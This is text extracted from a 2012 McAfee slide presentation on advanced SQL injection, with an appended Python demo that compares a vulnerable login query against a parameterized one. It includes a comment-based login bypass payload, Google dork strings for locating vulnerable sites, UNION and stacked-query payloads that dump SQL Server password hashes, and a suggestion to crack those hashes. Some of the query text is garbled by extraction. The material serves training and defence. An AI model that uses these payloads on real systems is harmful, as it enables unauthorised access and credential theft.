

Advanced SQL Injection
December 2012
Guillaume Loizeau, Regional Sales Manager, DB Security, McAfee

Agenda
- What is SQL Injection
- In-band Injection
- Out-of-band Injection
- Blind Injection
- Advanced techniques
- Infection
- Privilege elevation
- Escape the DB to OS
- Protection against SQL Injection

Introduction
SQL injection hacks in recent years:
- Heartland Payment Systems (2008): 132M credit cards
- RockYou (2009): 32M accounts
- Sony (2011)
- PBS (2011)
- Yahoo (2012): 500K logins stolen
- Wurm Online
- 53 universities hacked (2012)

SQL Injection - Definition
A SQL injection is a type of exploitation of a security flaw in an application that interacts with a database: a SQL query not anticipated by the system is injected and can compromise its security.

Simple SQL Injection
Query template:
SELECT ID FROM user WHERE name = '$name' AND password = '$passwd'

With $name = "stuart" and $password = "stuart", the query executed is:
SELECT ID FROM Users WHERE name = 'stuart' AND password = 'stuart'
The password is validated and the account ID is returned.

With $name = "stuart' --" and $password = "it_does_not_matter", the query executed is:
SELECT ID FROM Users WHERE name = 'stuart' --' AND password = 'it_does_not_matter'
Everything after -- is a comment, so what actually runs is:
SELECT ID FROM Users WHERE name = 'stuart'
The password is never evaluated and the account ID is returned.

Identifying SQL Injection - Web
- Find a target via Google ("Google dorks"): ociparse, ociexecute, OCIStmtExecute; ORA-01756, 907, 933, 917, 900, 903, 906, 923, 970, 1742, 1789; inurl:/pls/portal30; "Unclosed quotation mark"; "Invalid column"
- Conversion errors used for data retrieval: 0 / 0 / user
- Web application security scanner (Acunetix, Pangolin, SQLMap)
- Manually: pass in '

Different DB Techniques
Oracle makes the hacker's life harder:
- No stacked queries, unless you get lucky and inject into a PL/SQL block
- Stacked queries are possible on SQL Server:
select * from where EmployeeID = 1 = N'select user, password from sys.syslogins where password is not null'
- Native error messages are hard to control
- Better error messages on SQL Server:
select * from users where username = '' having 1=1 -- and password = ''
Msg 8120, Level 16, State 1, Line 1
Column 'ername' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
- No easy way to escape from the DB to the OS (no xp_cmdshell)
- No easy way to do time-based blind SQL injection (more later)
- Very limited in what you can do from an injection point
On the other hand:
- Large attack surface
- Many vulnerabilities

In-band SQL Injection - Unions
select * from employees where dept_id = 1 union select <something interesting that has the same number of columns>
Finding the number of columns by:
- Adding nulls
- Adding order by #
Slide tables: employees (Id, dept, Loc, Inv, Qty, Cost) with values US, Demo, US, EU; users (Name, Acct, State, pass, hint, date):
Smith 9234 CA secret asdf
Jones 8836 MA qwe
Doe 1521 NY iloveu lkd

SQL Injection In-band using SQL Server
select * from where EmployeeID = 1; select name, password from sys.syslogins where password is not null
Result rows (the password hash bytes did not survive the extraction):
adventure-works\guy1 16 Production Technician - WC :00: M M :00: AAE1D04A-C B4D :00:
sa <hash bytes unreadable>
test <hash bytes unreadable>
Now, just attack the password hash using either brute-force or a dictionary.
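The login query from the "Simple SQL Injection" slide, built both ways so the bypass and the fix can be compared side by side. This is an added example, not code from the slides; it assumes an in-memory SQLite database with a constructed Users table, and uses the page's own "stuart' --" input.

```python
"""Added example (not from the slides): the slide's login query built by
string concatenation and with bound parameters, run against a constructed
in-memory SQLite table so the difference in behaviour is observable."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user whose real password is 'stuart'."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (ID INTEGER PRIMARY KEY, name TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO Users (ID, name, password) VALUES (7, 'stuart', 'stuart')"
    )
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, name: str, password: str):
    """Vulnerable form from the slide: input is pasted into the SQL text, so a
    closing quote plus a comment marker in `name` drops the password check."""
    sql = f"SELECT ID FROM Users WHERE name = '{name}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn: sqlite3.Connection, name: str, password: str):
    """Hardened form: placeholders fix the query shape; the driver passes
    `name` as data, so the quote and `--` never reach the SQL parser."""
    sql = "SELECT ID FROM Users WHERE name = ? AND password = ?"
    row = conn.execute(sql, (name, password)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run the valid login and the slide's injected input through both forms."""
    conn = make_db()
    injected = "stuart' --"  # the $name value shown on the slide
    return {
        "valid_concat": login_concat(conn, "stuart", "stuart"),
        "valid_param": login_param(conn, "stuart", "stuart"),
        "injected_concat": login_concat(conn, injected, "it_does_not_matter"),
        "injected_param": login_param(conn, injected, "it_does_not_matter"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```

Only the concatenated query returns the account ID for the injected name; the parameterized query treats the whole string as a literal name and finds no row.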
